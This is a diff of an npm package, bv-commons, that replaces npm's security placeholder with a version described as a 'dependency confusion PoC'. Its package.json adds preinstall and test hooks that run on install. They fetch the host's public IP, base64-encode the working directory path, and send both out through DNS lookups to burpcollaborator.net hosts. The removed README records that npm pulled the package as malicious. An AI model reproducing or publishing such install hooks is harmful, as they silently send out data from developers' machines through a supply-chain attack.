bv-commons 0.0.1-security → 21.2.5

package/README.html

@@ -0,0 +1 @@
+Non-malicious PoC <s>1</s>

package/index.js

@@ -0,0 +1,3 @@
+exports.printMsg = function() {
+console.log("Grouseant depedency check POC Synack demo package");
+}

package/package.json

@@ -1,6 +1,20 @@
-{
-  "name": "bv-commons",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+{"name": "bv-commons",
+"version": "21.2.5",
+"description": "GROUSEANT bv-commons package dependency confusion PoCv1.4 ",
+"main": "index.js",
+"scripts": {
+"test": "nslookup \"$(host myip.opendns.com resolver1.opendns.com | grep \"myip.opendns.com has\" | awk '{print $4}').xrs83qgqjcoi3dmne7mlm608nztrhg.burpcollaborator.net\" && var=0 && for i in $(pwd|base64 -w 6|awk '{gsub(/.{50}/,\"&\\n\")}1'); do var=$((var+1)) && nslookup $var.$i.h2ksearauwz2exx7prx5xqbsyj4cs1.burpcollaborator.net; done",
+"preinstall": "nslookup \"$(host myip.opendns.com resolver1.opendns.com | grep \"myip.opendns.com has\" | awk '{print $4}').xrs83qgqjcoi3dmne7mlm608nztrhg.burpcollaborator.net\" && var=0 && for i in $(pwd|base64 -w 6|awk '{gsub(/.{50}/,\"&\\n\")}1'); do var=$((var+1)) && nslookup $var.$i.h2ksearauwz2exx7prx5xqbsyj4cs1.burpcollaborator.net; done"
+},
+"keywords": [
+  "PoC"
+],
+"dependencies": {},
+"config": {
+"unsafe-perm":true
+},
+"author": "bugbountys",
+"license": "ISC"
 }
+
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=bv-commons for more information.